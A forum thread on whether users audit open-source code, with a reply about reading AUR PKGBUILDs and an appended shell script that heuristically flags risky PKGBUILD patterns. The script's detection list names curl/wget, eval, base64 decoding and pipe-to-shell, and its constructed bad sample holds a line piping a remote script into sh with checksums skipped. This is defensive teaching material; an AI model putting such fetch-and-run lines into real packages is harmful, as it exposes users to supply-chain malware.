cross-posted from: https://lemmy.ml/post/30846701

The question is simple. I wanted to get a general consensus on whether people actually audit the code that they use from FOSS or open source software or apps.

Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?

Let’s hear it!

  • communism@lemmy.ml · 6 days ago

    Depends. I read the PKGBUILDs of all AUR packages I install at least, which is not the same as reading source code but it’s something. If it’s a very widely used piece of software I don’t bother—if all these people haven’t spotted some secret backdoor, I as a lay person am not going to be the one to spot it. I will read small things like bash scripts; in general, the more “obscure” software I run will be some kind of script. But also if you’re going to publish malware in a script you’re probably obscuring the malicious function so that someone doing a preliminary read won’t spot it.
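The comment above describes reading a PKGBUILD before running makepkg. As an added example (not from the commenter, and not an official makepkg or AUR tool), here is a small POSIX shell heuristic that flags the things a reviewer usually looks for first in a PKGBUILD: checksum verification turned off with `SKIP`, downloads made inside `build()`/`package()` rather than via the `source=()` array (those bypass makepkg's checksum step), obfuscation primitives such as `eval`, `base64 -d` or pipe-to-shell, and plain-HTTP source URLs. Both PKGBUILDs it scans are constructed samples, and the patterns are assumptions chosen for illustration; as the commenter notes, a determined author can obfuscate past any quick read, so a clean result is a starting point, not a verdict.

```shell
#!/bin/sh
# Added example: a heuristic pre-install scan of a PKGBUILD.
# Not part of the original post; sample PKGBUILDs below are constructed.

# audit_pkgbuild FILE
#   prints one WARN line per finding on stderr, and the finding count on stdout
audit_pkgbuild() {
    f="$1"
    n=0
    # 1. 'SKIP' disables makepkg's checksum verification of the source.
    #    Legitimate for VCS sources (git+https://...), suspicious for tarballs.
    if grep -Eq "^(md5|sha1|sha256|sha512|b2)sums=.*'SKIP'" "$f"; then
        echo "WARN: checksum verification skipped (SKIP)" >&2; n=$((n+1))
    fi
    # 2. curl/wget inside build steps fetch content makepkg never checksums.
    if grep -Eq '(^|[^a-zA-Z0-9_])(curl|wget)([^a-zA-Z0-9_]|$)' "$f"; then
        echo "WARN: curl/wget invoked outside the source=() array" >&2; n=$((n+1))
    fi
    # 3. Obfuscation primitives that hide what actually executes.
    if grep -Eq '(base64 +(-d|--decode)|(^|[^a-zA-Z0-9_])eval([^a-zA-Z0-9_]|$)|[|] *(ba)?sh([^a-zA-Z0-9_]|$))' "$f"; then
        echo "WARN: eval / base64 decode / pipe-to-shell present" >&2; n=$((n+1))
    fi
    # 4. Plain-HTTP sources can be altered in transit.
    if grep -Eq 'http://' "$f"; then
        echo "WARN: non-TLS source URL" >&2; n=$((n+1))
    fi
    echo "$n"
}

# Constructed sample 1: every heuristic should fire (expected count: 4).
SAMPLE="$(mktemp)"
CLEAN="$(mktemp)"
trap 'rm -f "$SAMPLE" "$CLEAN"' EXIT
cat > "$SAMPLE" <<'EOF'
# constructed demo package, not a real AUR entry
pkgname=example-tool
pkgver=1.0
pkgrel=1
source=("http://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$srcdir"
  curl -s https://example.invalid/post-install.sh | sh
}
EOF

# Constructed sample 2: pinned checksum, TLS source, no extra fetches (expected count: 0).
cat > "$CLEAN" <<'EOF'
pkgname=example-tool
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$srcdir/example-tool-$pkgver"
  make
}
EOF

echo "findings in suspicious sample: $(audit_pkgbuild "$SAMPLE")"
echo "findings in clean sample: $(audit_pkgbuild "$CLEAN")"
```

Run it against a real PKGBUILD with `audit_pkgbuild ./PKGBUILD` after sourcing the script; treat any non-zero count as "read this file properly before building", and remember that pattern 1 is expected for `-git` packages whose sources are VCS checkouts.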